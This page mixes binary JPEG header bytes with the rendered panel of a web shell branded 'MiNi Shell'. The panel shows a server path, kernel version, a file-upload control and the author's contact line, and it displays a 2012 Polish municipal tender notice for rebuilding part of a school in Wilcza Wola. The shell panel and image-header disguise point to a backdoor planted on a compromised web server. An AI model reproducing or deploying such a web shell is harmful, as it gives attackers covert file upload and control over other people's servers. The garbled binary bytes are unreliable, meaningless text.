JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/228217-N-2012.html

<p class="kh_header"><b>Dzikowiec: Wykonanie operacji pn.: Przebudowa części budynku gimnazjum Zespołu Szkół            w Wilczej Woli na budynek wielofunkcyjny jako centrum kulturalno - rekreacyjne wraz   z wyposażeniem  i budową chodnika.</b><br>
<b>Numer ogłoszenia: 228217 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dzikowiec , Dzikowiec 2, 36-122 Dzikowiec, tel. 0-17 7442109, faks 0-17 2274508.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie operacji pn.: Przebudowa części budynku gimnazjum Zespołu Szkół            w Wilczej Woli na budynek wielofunkcyjny jako centrum kulturalno - rekreacyjne wraz   z wyposażeniem  i budową chodnika..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest   przebudowa części budynku gimnazjum Zespołu Szkół               w Wilczej Woli na budynek wielofunkcyjny jako centrum kulturalno - rekreacyjne wraz               z wyposażeniem i budową chodnika. Zakres  robót obejmuje wykonanie:
-  roboty budowlano, adaptacyjne i wykończeniowe,
-  roboty instalacji wod.-kan. c.o. i gaz,
-  roboty instalacji elektrycznych,
-  wyposażenie w meble i  technologiczne podgrzewalni,
-  place i chodniki o nawierzchni z kostki brukowej.
 Szczegółowy zakres robót precyzuje  projekt budowlano - zamienny , przedmiary robót,
 specyfikacja  techniczna wykonania i odbioru robót, stanowiące załączniki do siwz.
W sytuacji gdy Zamawiający opisał przedmiot zamówienia przez wskazanie producenta urządzenia, materiału budowlanego lub przez wskazanie znaku towarowego, to należy rozumieć, iż dopuszcza się zastosowanie materiałów równoważnych. 
Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod 
warunkiem, że zagwarantują one wykonanie przedmiotu zamówienia oraz zapewnią  uzyskanie  parametrów technicznych nie gorszych od założonych w ww. dokumentach.
Na wykonawcy spoczywa obowiązek wykazania, iż oferowane urządzenia i materiały budowlane spełniają wymagania Zamawiającego.
Wykonawca wykona zamówienie z użyciem materiałów i urządzeń własnych. 
Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów fabrycznie 
nowych, gwarantujących odpowiednią jakość, o parametrach technicznych
i jakościowych określonych w dokumentacji projektowej. Wykonawca zobowiązany 
jest do dostarczenia atestów i certyfikatów na każde żądanie Zamawiającego.
Zamawiający dopuszcza udział podwykonawców przy realizacji zamówienia.
 Zamawiający żąda (na podst. art. 36 ust. 4 ustawy Pzp) wskazania przez Wykonawcę  
 w ofercie części zamówienia , której wykonanie powierzy podwykonawcom.
 W przypadku spowodowania szkód w trakcie wykonywania robót Wykonawca jest
  zobowiązany do ich niezwłocznego  usunięcia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7, 45.21.42.00-2, 45.11.10.00-8, 45.33.10.00-6, 45.33.30.00-0, 45.33.20.00-3, 45.33.11.00-7, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 15.000,00 zł .
Wadium musi być wniesione na cały okres związania z ofertą, przed upływem terminu składania ofert w jednej lub kilku następujących formach: 
1) pieniądzu, przelewem na rachunek bankowy Zamawiającego w BS Głogów Młp.
    O/Dzikowiec nr  27915910102003300000390006; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
    kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy    
    z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. 
    U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz 
    z 2010 r. Nr 96, poz. 620) .
Wadium wniesione w pieniądzu będzie przechowywane na rachunku bankowym 
Zamawiającego. Kopię polecenia przelewu należy dołączyć do oferty. 
Poręczenie lub gwarancja, wnoszone jako wadium, muszą być bezwarunkowe                         i nieodwołalne. Muszą być wystawione na: Gmina Dzikowiec, 36-122 Dzikowiec 2                   i obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Prawo Zamówień Publicznych oraz bezwarunkowe zobowiązanie odpowiednio poręczyciela lub gwaranta, do zapłacenia kwoty wadium, na pierwsze pisemne żądanie Zamawiającego, zawierające oświadczenie o zaistnieniu któregokolwiek z tych przypadków, w ciągu 14 dni od daty otrzymania tego żądania. 
Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo Zamówień Publicznych Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy Wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
    określonych  w ofercie, 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
    leżących po stronie Wykonawcy. 
 Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie 
  złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub 
  pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
Poręczenie lub gwarancja, wnoszone jako wadium, muszą być dołączone do oferty 
w oryginale. 
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp. Zamawiający może żądać ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 3 ustawy Pzp, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana, jako najkorzystniejsza. W takim przypadku Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga 
     posiadania specjalnych uprawnień. 
    Zamawiający uzna, że Wykonawca spełnił warunek, jeżeli złoży oświadczenie w trybie art.   22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania wiedzy i doświadczenia   Wykonawca  musi wykazać     się wykonaniem w okresie ostatnich pięciu lat   przed upływem terminu składania ofert,       a  jeżeli okres    prowadzenia działalności jest   krótszy - w tym okresie: 
      - co najmniej jednym zadaniem  w zakresie robót budowy, przebudowy, modernizacji     i remoncie obiektów kubaturowych odpowiadających   swoim rodzajem o wartości        robót minimum 500.000,00 zł   brutto i załączą dokumenty  potwierdzające, że roboty         zostały wykonane  zgodnie   z zasadami sztuki budowlanej i prawidłowo  ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający
        dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
a)	osobą która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia
      budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - 
      budowlanej bez ograniczeń określone obowiązującymi przepisami Prawa   
      budowlanego, lub odpowiadające im ważne uprawnienia budowlane, które zostały     wydane na podstawie wcześniej obowiązujących przepisów. 
b)	osobą która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia
              budowlane do kierowania robotami budowlanymi bez ograniczeń w  specjalności    instalacyjnej w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych        określone obowiązującymi przepisami Prawa budowlanego, lub odpowiadające im   ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej 
             obowiązujących przepisów. 
         c) osobą która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia
              budowlane do kierowania robotami budowlanymi bez ograniczeń w  specjalności  instalacyjnej w zakresie, instalacji i urządzeń elektrycznych i elektroenergetycznych   określone obowiązującymi przepisami Prawa budowlanego, lub odpowiadające im   ważne uprawnienia budowlane, które  zostały wydane na podstawie wcześniej  obowiązujących przepisów. 
Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem
spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla
poszczególnych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający
    dokona oceny spełniania warunków udziału w postępowaniu na     podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca  polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go   z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazane są istotne zmiany postanowień  zawartej umowy w stosunku do treści oferty, na podstawie , której dokonano wyboru wykonawcy, chyba , że  wystąpią okoliczności , które przemawiają za koniecznością zmiany  postanowień umowy tj.     1. Zmiany terminu realizacji przedmiotu zamówienia, w przypadku: 
a) niesprzyjających warunków atmosferycznych (np. długotrwałe intensywne opady 
    deszczu lub śniegu, silny wiatr, powodzie,  temperatura powietrza, przy której 
    niedopuszczalne jest prowadzenie robót ) ,
b) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie 
    robót- o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do 
   wykonania dodatkowych ekspertyz, badań, 
c) konieczności wykonania dodatkowych badań i ekspertyz - o czas niezbędny do uzyskania 
   wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań, 
d) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy,     wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań  
    w tym udzielenie w trakcie realizacji umowy zamówień dodatkowych - o czas niezbędny 
   do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy; 
e) w przypadku zaistnienia innych okoliczności nie wymienionych powyżej niezależnych od    Zamawiającego,
f) działania siły wyższej. 
2) zmiana przedstawicieli stron, podmiotów biorących udział w postępowaniu- kierownika     budowy, inspektorów nadzoru, podmiotów trzecich - w przypadku niemożności pełnienia 
     przez nich powierzonych funkcji, realizacji zamówienia (np. zdarzenia losowe, zmiana       pracy, rezygnacja). Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego     Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu,     Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot wykaże spełnianie     warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie    zamówienia przez dotychczasowy podmiot. 
3) zmiana zakresu rzeczowego w przypadku gdy: 
a) dla prawidłowej realizacji przedmiotu zamówienia niezbędne jest użycie innych 
    materiałów, niż wskazanych w ofercie wykonawcy lub SIWZ nie powodujących wzrostu     wynagrodzenia wykonawcy 
b) z przyczyn niezależnych od zamawiającego konieczna jest zmiana zakresu robót 
     wskazanego w SIWZ i ofercie ( zmniejszenie lub zwiększenie zakresu robót, zmiana 
     parametrów).
c) rezygnacji przez Zamawiającego z realizacji części przedmiotu Umowy. W takim przypadku     wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający     zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca     poniósł w związku z wynikającymi z Umowy planowanymi świadczeniami.
Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.
Wzór umowy, stanowi załącznik nr 6 do SIWZ.
Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku 
postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.dzikowiec.itl.pl/bip/index.php?page=position2.php&id=1259&grp=10<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dzikowiec, 36-122 Dzikowiec 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 10:00, miejsce: Urząd Gminy Dzikowiec, 36-122 Dzikowiec 2 / sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja dofinansowana ze środków Unii Europejskiej w ramach  środka 4.1 Rozwój obszarów zależnych            od rybactwa objętego  Programem Operacyjnym   Zrównoważony rozwój sektora rybołówstwa          i nadbrzeżnych obszarów rybackich 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com